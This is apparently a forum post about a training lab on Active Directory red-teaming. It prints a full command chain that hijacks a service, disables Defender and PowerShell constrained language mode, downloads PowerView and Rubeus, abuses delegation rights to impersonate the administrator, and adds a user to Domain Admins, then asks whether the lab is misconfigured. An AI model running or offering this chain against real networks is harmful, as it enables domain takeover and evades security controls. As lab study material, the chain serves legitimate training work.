Red-teaming Active Directory Lab #2 (ELS.BANK): scenario 3 protected users

Spoiler alert…

The solution states:

With everything set now, we can utilize Rubeus to get a ticket for “exch_adm” and assign the DCSync rights as we did in Scenario 1 (remember that Domain admins are members of “Protected users” so we can’t simply utilize this attack to get access to those accounts).

But executing the following commands will get a ticket for administrator and will still add a user to domain admins

# provide privesc.exe
sc.exe config "Service KMSELDI"  binPath=C:\Users\analyst1\Downloads\privesc.exe
sc.exe stop "Service KMSELDI" 
sc.exe start "Service KMSELDI"
# disable clm and defender as admin
Set-MpPreference -DisableRealtimeMonitoring $true
setx __PSLockdownPolicy 0 /m
# do slavi work
# Welcome123
runas /user:els\slavi "powershell -ep bypass"
cd $env:Userprofile
(New-Object Net.Webclient).DownloadFile("", "$env:Userprofile\powerview.ps1")
(New-Object Net.Webclient).DownloadFile("", "$env:Userprofile\Rubeus.exe")
Import-Module .\powerview.ps1
Set-DomainObjectOwner -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -OwnerIdentity slavi -Verbose
Add-DomainObjectACL -TargetIdentity S-1-5-21-3192643952-2658629199-322554960-1000 -Rights All -PrincipalIdentity slavi
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList "els\svc-omada").Translate([System.Security.Principal.SecurityIdentifier])).Value
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-DomainObject -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
.\Rubeus.exe s4u /user:svc-omada /rc4:65F91B600E51F19A80593D0A62047CC5 /impersonateuser:administrator /msdsspn:"host/" /altservice:ldap,rpc,http,cifs /ptt
net group "Domain Admins" /domain /add analyst1
The request will be processed at a domain controller for domain

The command completed successfully.

That seems to be in direct contradiction to the solution

is that a lab misconfiguration?